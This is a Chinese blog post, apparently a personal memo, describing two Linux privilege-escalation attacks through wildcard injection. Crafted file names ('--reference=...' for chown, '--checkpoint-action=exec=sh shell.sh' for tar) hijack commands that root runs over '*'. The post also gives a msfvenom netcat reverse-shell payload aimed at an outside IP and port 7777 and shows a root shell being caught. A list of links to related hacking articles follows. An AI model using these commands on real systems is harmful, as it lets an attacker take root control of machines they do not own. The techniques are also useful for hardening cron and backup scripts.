linux 钓鱼,记录Linux下的钓鱼提权思路

最新推荐文章于 2022-11-12 23:02:16 发布
最新推荐文章于 2022-11-12 23:02:16 发布
阅读量145 收藏
点赞数
文章标签: linux 钓鱼

以两个例子的形式进行记录,作为备忘:

0x01 Chown的--reference特性

存在三个用户:root、yunsle和test,假设这样一个场景,root用户要将/home/test下所有的文件所有者设置为test,那么yunsle如何通过root的这样一个操作,达到攻击目的呢?

文件中目前内容如下:

6bd57f4b2ddf5472d55162be752fa749.png

snipaste20180802_114639.png

攻击者yunsle在/home/test下创建两个文件,如下:

echo "">yunsle

echo > --reference=yunsle

e336565717e2af3f809acb3ed30f0cd4.png

snipaste20180802_114719.png

此时root用户在当前目录下执行将所有文件拥有者设置为test的chown命令:

chown -R test:test *

9d65b1edbe7f24a4d9aae55181f48651.png

snipaste20180802_114751.png

虽然命令执行出现了报错,但是再查看文件,发现拥有者并没有修改为test,而是yunsle:

eb51e5227f43239f7d84209206b56ca8.png

snipaste20180802_114819.png

0x02 tar的命令执行:--checkpoint-action&--checkpoint

存在两个用户:root、yunsle,其中yunsle是非root组的攻击者,需要想办法提升权限,可以使用tar命令进行利用。

如果在cron计划中,root用户存在计划执行并且使用到了tar命令,或者攻击者提前知道root会对某个人文件执行tar,可以形成攻击场景。

攻击者首先自己可以生成一个反弹shell,如使用msfvenom:

msfvenom -p cmd/unix/reverse_netcat lhost=47.94.37.40 lport=7777 R

96aac8a233d1509fd23b214819ee8ebb.png

snipaste20180802_114846.png

并且在接收机上监听7777端口:

dcb3e56daee09636cb666696ce208fd7.png

snipaste20180802_114917.png

将反弹shell内容在目标机上,写入shell.sh文件:

32e1e46867c2bbbccf557d2ba5426b37.png

snipaste20180802_114931.png

接下来再创建两个文件:

echo > "--checkpoint-action=exec=sh shell.sh"

echo > --checkpoint=1

dfc39b55277d8b2e01c3b5a9524a4cfa.png

snipaste20180802_114953.png

此时,root对当前目录执行类似如下的tar操作:

tar -zcf bak.tgz /home/test/*

d67acf9a2170c2acb2caced42f7ff7d6.png

snipaste20180802_115017.png

已经成功以root身份执行shell.sh,并且将shell反弹至攻击者服务器:

4be2fe30a01c2729a4efffea6945fd69.png

snipaste20180802_115034.png

美界柯南
关注
网络攻防中利用各种漏洞和绕过Linux系统提权获取系统最高权限,多种方案详细和漏洞详细实现教程实战
代码讲故事
04-12 512
网络攻防中利用各种漏洞和绕过Linux系统提权获取系统最高权限,多种方案详细和漏洞详细实现教程实战。在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。
Linux学习记录
everythingbeau的博客
07-21 2985
RPM(RedHatPackageManager),RedHat软件包管理工具,类似windows里面的setup.exe是Linux这系列操作系统里面的打包安装工具,它虽然是RedHat的标志,但理念是通用的。RPM包的名称格式-“apache”软件名称-“1.3.23-11”软件的版本号,主版本和此版本-“i386”是软件所运行的硬件平台,Intel32位处理器的统称-“rpm”文件扩展名,代表RPM包/bin/sh/bin/bashHOM。...
利用CVE-2021-3156进行远程提权
Zero_wenlong的博客
10-30 3257
利用CVE-2021-3156进行远程提权 一、漏洞简介 2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分. 当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(
钓鱼的例子讲Linux五种网络IO模型
专注交流
08-10 535
如果对您有帮助,麻烦右边点个赞哦~~~     注:分布式的环境会与单机Linux五种网络IO模型的原理不一样。   网络I/O的本质是socket的读取,socket在linux系统被抽象为流,I/O可以理解为对流的操作。这个操作又分为两个阶段: 等待流数据准备(wating for the data to be ready)。 从内核向进程复制数据(copying the dat...
kali linux钓鱼教程,Kali linux建立钓鱼热点
weixin_30608641的博客
05-09 429
主要内容:参考网上多篇文章,自己动手完全实验成功,在这里详细记录自己在kalilinux下的搭建过程,本文着重于动手实现,不涉及原理,关于原理应该会在之后的单独文章中详细探究实验环境:Host 主机: Windows 8 64位虚拟机软件:VirtualBox 4.3.8(需要安装同4.3.8版本 拓展包 和 增强功能包 ,这是两个不同的包!安装增强包的时候需要安装相应的内核头文件和编译环境,这...
Msfvenom-命令-总结大全--
爱我非你莫属的博客
10-05 1688
Msfvenom命令 -p (–payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) -l 查看所有payload encoder nops。 -f (–help-formats) 输出文件格式。 (- -hel
EDR项目在win server、linux、windows上安装进度表
12-21
EDR部署进度更新文件通常会记录每一步的完成情况,包括安装、配置、测试和优化阶段。这些更新可能包括: 1. 已安装的服务器和桌面数量。 2. 遇到的问题及解决方案。 3. 安全事件的数量和类型。 4. 性能监控数据,如...
chromium-linux.zip
10-06
总的来说,"chromium-linux.zip" 提供了一个深入了解和参与浏览器开发的机会,对于 Linux 开发者来说,这是一份宝贵的资源,可以学习到现代浏览器的工作原理,以及如何在 Linux 环境下进行高性能的软件开发。...
记录Linux下的钓鱼提权思路
weixin_33901926的博客
08-02 113
参考Freebuf上的提权文章(利用通配符进行Linux本地提权):http://www.freebuf.com/articles/system/176255.html 以两个例子的形式进行记录,作为备忘: 0x01 Chown的--reference特性 存在三个用户:root、yunsle和test,假设...
web安全渗透之钓鱼网站提权
kali_Ma的博客
11-12 4490
要生成一个钓鱼网址链接,诱导用户点击,实验过程是让win7去点击这个钓鱼网站链接,则会自动打开一个文件共享服务器的文件夹,在这个文件夹里面会有两个文件,当用户分别点击执行后,则会主动连接到发起攻击的主机上,即可攻击成功:攻击成功后,想要从kali上传文件到win7中,后发现权限不够的问题,则进行提权操作,后成功上传文件win7和kaliKali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。
Kali-Linux下创建一个钓鱼WiFi热点
奋起的blog
02-26 2万+
http://www.myhack58.com/Article/sort097/2015/65019.htm 实验假设 通过伪造免费无线AP热点进行钓鱼的实验,分析、重放无线数据包窃取用户隐私,伪造钓鱼网站捕获用户账户密码,模拟黑客钓鱼攻击,评估无线热点安全隐患。 理论依据 手机开启WiFi功能后,会自动扫描附近的无线网络信号,当我们
Kali linux搭建钓鱼wifi
热门推荐
含笑
05-02 2万+
使用airbase-ng这款工具可以帮助我们建立Soft AP(伪AP),airbase-ng的使用参数如下:Options: -a bssid: set Access Point MAC address //设置AP的MAC地址 -i iface: capture packets from this interface //从指定接口抓取数据包(默认和数据包发送的口是同一个接口) -w
【漏洞挖掘】QQ钓鱼网站实战渗透
m0_46344990的博客
04-14 4856
渗透实战,通过报错注入拿到后台账号密码。
Matlab Toolbox for Interval Type-2 Fuzzy Logic Systems.rar
最新发布
09-20
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
基于java的大学生第二课堂设计与实现.docx
09-20
基于java的大学生第二课堂设计与实现.docx
vue+SpringBoot442大学校园快递代取管理系统的设计与实现java毕业设计源码含论文.rar
09-20
jdk版本:jdk1.8+ 前端:vue.js+ElementUI 开发工具:IDEA 或者eclipse都支持 编程语言: java 框架支持:springboot 数据库: mysql 版本不限 数据库工具:Navicat/SQLyog都可以 详细技术:java+springboot+vue+MYSQL+MAVEN 前端采用的Vue框架,后端采用java语言,sprinboot框架,mybatis操作数据源,使用软件:idea,eclipse、MySQL。完成了用户登录管理等模块的设计与实现。完成了系统数据库的设计,并基于MySQL数据库管理系统
win和android安卓平台的播放器 .zip(毕设&课设&实训&大作业&竞赛&项目)
09-20
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用。
Linux环境下反垃圾邮件管理系统设计与实现
文章强调了Linux环境下反垃圾邮件管理系统的必要性,并描述了系统架构及其主要模块,包括前台界面、邮件接收、邮件解析、内容分析和钓鱼邮件检测。" 在Linux环境下,反垃圾邮件管理系统是一个至关重要的工具,它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值